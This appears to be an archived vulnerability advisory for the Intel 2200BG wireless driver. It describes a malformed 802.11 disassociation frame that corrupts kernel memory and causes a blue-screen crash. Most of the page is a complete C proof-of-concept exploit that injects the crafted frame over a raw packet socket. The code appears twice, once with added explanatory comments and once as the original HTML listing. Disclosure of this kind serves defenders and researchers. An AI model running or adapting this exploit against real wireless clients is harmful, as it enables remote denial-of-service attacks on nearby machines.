The Intel wireless mini-pci driver provided with Intel 2200BG cards is vulnerable to a remote memory corruption flaw. Malformed disassociation packets can be used to corrupt internal kernel structures, causing a denial of service (BSOD). Proof of concept exploit included.
96c1c5bf7fd32a53f660b0d112ab257bb65b17df4bb6322e76691519e7c61735
Title: Intel 2200BG 802.11 disassociation packet Kernel Memory Corruption
Description: The Intel wireless mini-PCI driver provided with Intel
2200BG cards is vulnerable to a remote memory corruption flaw.
Malformed disassociation packets can be used to corrupt internal kernel
structures, causing a denial of service (BSOD).
This vulnerability was found in Intel 2200 driver version 9.0.3.9
(09/12/2005).
Driver files:
w29n51.sys 9ee38ffcb4cbe5bee6c305700ddc4725
w29mlres.dll 35afeccc4092b69f62d757c4707c74e9
w29NCPA.dll 980f58b157baedc23026dd9302406bdd
Author: Breno Silva Pinto (Sekure.org / bsilva[at]sekure[dot]org)
Proof Of Concept:
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/ioctl.h>
#include <asm/types.h>
#include <linux/if.h>
#include <linux/if_packet.h>
#include <linux/if_ether.h>
#include <linux/if_arp.h>
#include <netinet/in.h>
#include <stdlib.h>
#include <string.h>
#include <stdio.h>
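// 28-byte 802.11 disassociation management frame, laid out as the author
// labelled it: 2 frame-control bytes, 2 duration bytes, three 6-byte
// addresses, 2 sequence-control bytes and the 4 trailing bytes below.
// Stored as unsigned char so the values >= 0x80 are represented exactly;
// in a plain `char` array (which may be signed) their conversion is
// implementation-defined.
const unsigned char d[] = {
    0xa0, 0x00,                         // Frame Control: 0xa0 = management frame, subtype 10 (Disassociation); flags byte 0x00
    0x00, 0x00,                         // Duration / ID
    0x00, 0x12, 0xf0, 0x29, 0x77, 0x00, // Destination address (DA)
    0xbb, 0xbb, 0xbb, 0xbb, 0xbb, 0xbb, // Source address (SA)
    0x00, 0x0f, 0x66, 0x11, 0x7b, 0xd0, // BSSID
    0x00, 0x00,                         // Sequence control (the original comment calls this "Frag. Number")
    0x01, 0x00, 0x00, 0x00              // Reason code, 2 bytes (value 1); the last two bytes are not labelled in the original listing
};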
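// Entry point of the proof of concept: binds a raw PF_PACKET socket to the
// hard-coded interface "ath0raw", transmits the frame in `d` once and prints
// the byte count sendto() accepted.
//
// Returns 0 on success and -1 when any socket, ioctl, bind or sendto call
// fails (the original returned 0 from two of those failure paths, making
// them indistinguishable from success). Every descriptor opened here is
// closed on every path; the original reused `s` for the second socket and
// leaked the first one.
int main(void) {
    struct sockaddr_ll addr;
    struct ifreq iface;
    char packet[sizeof(d)];
    int ctl;  // PF_INET/SOCK_DGRAM socket used only to run the interface ioctls
    int raw;  // PF_PACKET/SOCK_RAW socket the frame is sent on
    int len;  // byte count returned by sendto()

    memset(&iface, 0, sizeof(iface));
    memset(&addr, 0, sizeof(addr));
    memset(packet, 0, sizeof(packet));

    ctl = socket(PF_INET, SOCK_DGRAM, 0);
    if (ctl < 0) {
        perror("socket(PF_INET, SOCK_DGRAM)");
        return -1;
    }

    // ifr_name is a fixed IFNAMSIZ-byte field; snprintf cannot overrun it and
    // always NUL-terminates, whereas the original strcpy relied on the
    // literal being short enough.
    snprintf(iface.ifr_name, sizeof(iface.ifr_name), "%s", "ath0raw");

    // SIOCGIFHWADDR is kept from the original even though its result is never
    // read: it fails early when the interface does not exist. SIOCGIFINDEX
    // fills iface.ifr_ifindex, which the bind below needs.
    if (ioctl(ctl, SIOCGIFHWADDR, &iface) != 0 ||
        ioctl(ctl, SIOCGIFINDEX, &iface) != 0) {
        perror("ioctl");
        close(ctl);
        return -1;
    }
    close(ctl);  // the ioctl socket has served its purpose

    raw = socket(PF_PACKET, SOCK_RAW, htons(ETH_P_ALL));
    if (raw < 0) {
        perror("socket(PF_PACKET, SOCK_RAW)");
        return -1;
    }

    addr.sll_family = AF_PACKET;
    addr.sll_ifindex = iface.ifr_ifindex;
    if (bind(raw, (struct sockaddr *)&addr, sizeof(addr)) < 0) {
        perror("bind");
        close(raw);
        return -1;
    }

    memcpy(packet, d, sizeof(d));
    len = sendto(raw, packet, sizeof(d), 0, NULL, 0);
    usleep(5000);  // kept from the original; its purpose is not stated there
    if (len < 0) {
        // The original printed "-1 bytes enviados" here and still exited 0.
        perror("sendto");
        close(raw);
        return -1;
    }
    printf("%d bytes enviados\n", len);  // runtime string kept verbatim ("bytes sent")

    close(raw);
    return 0;
}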
<p>Title: Intel 2200BG 802.11 disassociation packet Kernel Memory Corruption</p>
<p>Description: The Intel wireless mini-PCI driver provided with Intel<br>2200BG cards is vulnerable to a remote memory corruption flaw.<br>Malformed disassociation packets can be used to corrupt internal kernel<br>structures, causing a denial of service (BSOD).
</p>
<p>This vulnerability was found in Intel 2200 driver version 9.0.3.9 (09/12/2005).</p>
<p>Driver files:</p>
<p>w29n51.sys 9ee38ffcb4cbe5bee6c305700ddc4725<br>w29mlres.dll 35afeccc4092b69f62d757c4707c74e9<br>w29NCPA.dll 980f58b157baedc23026dd9302406bdd</p>
<p>Author: Breno Silva Pinto (<a href="https://Sekure.org">Sekure.org</a> / bsilva[at]sekure[dot]org)<br> </p>
<p>Proof Of Concept:</p>
<p>#include <unistd.h><br>#include <sys/types.h><br>#include <sys/socket.h><br>#include <sys/ioctl.h><br>#include <asm/types.h><br>#include <linux/if.h><br>#include <linux/if_packet.h>
<br>#include <linux/if_ether.h><br>#include <linux/if_arp.h><br>#include <netinet/in.h><br>#include <stdlib.h><br>#include <string.h><br>#include <stdio.h></p>
<p>// 28 bytes disassociation packet.</p>
<p>char d[] = { 0xa0, 0x00, // 0xa0 pacote Disassociate 0xa000 FC Normal<br> 0x00, 0x00, // Duration ID<br> 0x00, 0x12, 0xf0, 0x29, 0x77, 0x00, // DST addr<br> 0xbb, 0xbb, 0xbb, 0xbb, 0xbb, 0xbb, // SRC addr
<br> 0x00, 0x0f, 0x66, 0x11, 0x7b, 0xd0, // BSS id<br> 0x00, 0x00, // Frag. Number<br> 0x01, 0x00, 0x00, 0x00 }; // 2 bytes - Reason code</p>
<p>int main() {<br> struct sockaddr_ll link;<br> struct ifreq iface;<br> int s;<br> char packet[sizeof(d)];<br> int len = 0;</p>
<p> if((s=socket(PF_INET, SOCK_DGRAM, 0))<0)<br> return 0;</p>
<p> bzero(&iface,sizeof(iface));<br> bzero(&link,sizeof(link));<br> bzero(packet,sizeof(d));</p>
<p> strcpy(iface.ifr_name,"ath0raw");</p>
<p> if(ioctl(s,SIOCGIFHWADDR, &iface)) {<br> return 0;<br> }<br> <br> if(ioctl(s,SIOCGIFINDEX, &iface)) {<br> return -1;<br> }</p>
<p> if((s=socket(PF_PACKET, SOCK_RAW, htons(ETH_P_ALL)))<0) {<br> return -1;<br> }</p>
<p> link.sll_family = AF_PACKET;<br> link.sll_ifindex = iface.ifr_ifindex;<br> <br> if(bind(s,(struct sockaddr *) &link, sizeof(link))<0) {<br> return -1;<br> }</p>
<p> memcpy(packet,d,sizeof(d));<br> len = sendto(s,packet,sizeof(d), 0, NULL, 0);<br> usleep(5000); <br> printf("%d bytes enviados\n",len);</p>
<p> close(s);</p>
<p> return 0;<br>}</p>
<p> </p>